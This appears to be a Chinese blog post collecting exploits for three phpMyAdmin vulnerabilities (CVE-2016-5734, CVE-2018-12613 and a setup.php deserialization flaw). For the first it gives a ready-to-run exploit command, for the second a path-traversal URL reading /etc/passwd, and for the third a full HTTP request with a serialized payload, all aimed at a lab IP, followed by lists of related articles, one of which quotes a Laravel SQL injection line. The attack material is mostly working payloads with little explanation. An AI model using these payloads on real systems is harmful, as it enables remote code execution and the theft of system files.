1.PhpMyAdmin 4.0.x—4.6.2 远程代码执行 (CVE-2016-5734)
        操作技巧：
            去https://www.exploit-db.com/exploits/40185下载一个exp文件
            执行python3 phpmyadmin.py -c 'system(id);' -u root -p root -d test http://192.168.68.129:8080
        漏洞原理：
        漏洞版本：
            4.0.x version before 4.0.10.16
            4.4.x version before 4.4.15.7
            4.6.x version before 4.6.3 (actually because this version requires PHP5.5+, this vulnerability cannot be reproduced)
    2.phpmyadmin远程文件包含漏洞(CVE-2018-12613)
        操作技巧：
            payload：http://192.168.68.129:8080/?target=db_datadict.php?/../../../../../../../../etc/passwd
        漏洞原理：
            在对传参的参数进行过滤时，需要过滤代码，但是传参点很多，需要多次输入过滤代码，开发人员考虑到使用将过滤代码写入过滤文件，通过include包含该文件，来达到一个过滤的目的，
            假如这个包含的文件是可以控制的，那么就可能导致文件包含，该漏洞中，主要是因为对于传参包含文件的参数过滤时，只是对其内容进行检测白名单验证，只要target参数是白名单中的
            参数，同时代码会对？后面的参数进行排除，所以构造出恶意代码target=db_datadict.php?/../../，还有一个原因就是，a?/../，比如在cmd命令行中，cd 到一个不存在的目录，会报错，
            但是如果在其后加一个/../，系统会默认认为还是在当前目录，就不会对错误目录进行检查，也就不会报错；综上所有原因，导致了该漏洞的出现。
        漏洞版本：phpMyAdmin 4.8.0和4.8.1
    3.Phpmyadmin Scripts/setup.php反序列化漏洞 (WooYun-2016-199433)
        操作技巧：
            POST /scripts/setup.php HTTP/1.1
            Host: 192.168.68.129:8080
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
            Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
            Accept-Encoding: gzip, deflate
            Connection: close
            Cookie: phpMyAdmin=pZb3cMlU0GbpnfHX0mRA4mbWlRd
            Upgrade-Insecure-Requests: 1
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 80

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
        漏洞原理：
        漏洞版本：2.x

phpmyadmin漏洞合集相关推荐

1. Laravel 漏洞合集

   Laravel 漏洞合集 Laravel 存在SQL注入漏洞 poc: /test?email=1&id=1 union select user()# /test?email=1/`& ...

2. Spring框架漏洞合集

   Spring框架漏洞合集 Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977) 访问路径/oauth/authorize,会看到左上角有个绿色叶子的标志,一般都 ...

3. spring漏洞合集 下

   前言 现在的 java 开放的网站十个里面有九个是 spring 写的.网上对 spring 相关漏洞的资料很多,但是总结的文章却很少,再加上 spring 庞大的生态,每当看到 spring 相关网 ...

4. 二十八种未授权访问漏洞合集（暂时最全）

   目录 0x01 未授权漏洞预览 0x02 Active MQ 未授权访问 0x03 Atlassian Crowd 未授权访问 0x04 CouchDB 未授权访问 0x05 Docker 未授权访问 ...

5. MetInfo最新版代码审计漏洞合集

   最近想给 X 天贡献点插件,时常会去留意 seebug 的最新漏洞列表,发现最近 MetInfo 的漏洞上座率蛮高的,就挑它来代码审计了一波. seebug 上均是 MetInfo 6.0.0 版本的 ...

6. zend及Slim 漏洞合集

   zend漏洞 zend framework文件读取漏洞分析 Zend Framework 1.11.13.1.12.0之前版本内的(1) Zend_Dom, (2) Zend_Feed, (3) Ze ...

7. Typo3及Nette漏洞合集

   Typo3 漏洞 Typo3 反序例化漏洞 在表单中提交任意符合数组格式的输入,在后端代码中都会被解析,然后后端根据TCA来进行判断并处理.比如我们在提交表单中新增一个名为a[b][c][d],值为2 ...

8. struts2远程代码执行漏洞合集

   声明 好好学习,天天向上 S2-001 漏洞描述 因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中.例 ...

9. Spring MVC漏洞合集

   Spring MVC 目录穿越漏洞(CVE-2018-1271) 漏洞简介 2018年04月05日,Pivotal公布了Spring MVC存在一个目录穿越漏洞(CVE-2018-1271).Spri ...

最新文章

1. springMVC教程--拦截器详解
2. C++11并发编程：多线程std::thread
3. Building wheel for mmcv-full (setup.py) ... error和OSError: CUDA_HOME environment variable is not set
4. (cljs/run-at (JSVM. :browser) 简单类型可不简单啊～)
5. STL札记2（序列容器vector、list、deque）
6. Android：获取最近打开app列表
7. 在Windows平台下的IIS中发布Django应用
8. vue实现一个移动端屏蔽滑动的遮罩层
9. CentOS5.2下安装yum
10. 计算机控制面板设置命令,进入开始---设置--控制面板--声音和音频设备命令
11. [数据压缩作业2]TIFF文件格式分析
12. 盖茨与鲍尔默愤而诉Google 李开复离职有内情 -- ,买skype来控制桌面建立渠道吧
13. css3的animation动画属性实现闹钟左右摇摆
14. oracle分组查询最新的一条
15. FLINK 极客时间
16. 使用Arduino Motor Shield控制步进制电机
17. Kurl——轻量化http-authentication在线暴破工具
18. matlab cbfreeze,Matlab：如何在同一图中为不同的表面指定不同的色图/色块
19. SQL开发中容易被忽略的BUG~
20. 2015-年校内选拔-蓝桥杯C-(A组)赛题-勾股定理

热门文章

1. Zepeto难逃昙花一现的命运 但虚拟形象的未来不得不引人深思
2. 亚马逊美国站fbm是什么意思？亚马逊美国站店铺fbm如何发货？
3. 866363-70-4，N3-C5-NHS ester，叠氮-C5-NHS 主要物理性质分享
4. Linux入侵检测方法
5. android 定位相关
6. AE脚本错误提示，黄色提示条 隐藏显示方法
7. MobX 学习 - 01 MobX 简介
8. 微信小程序真机调试白屏，只显示Tabbar
9. Self-Attention 自注意力机制
10. mysql和sql视图连接_SQL视图和多表连接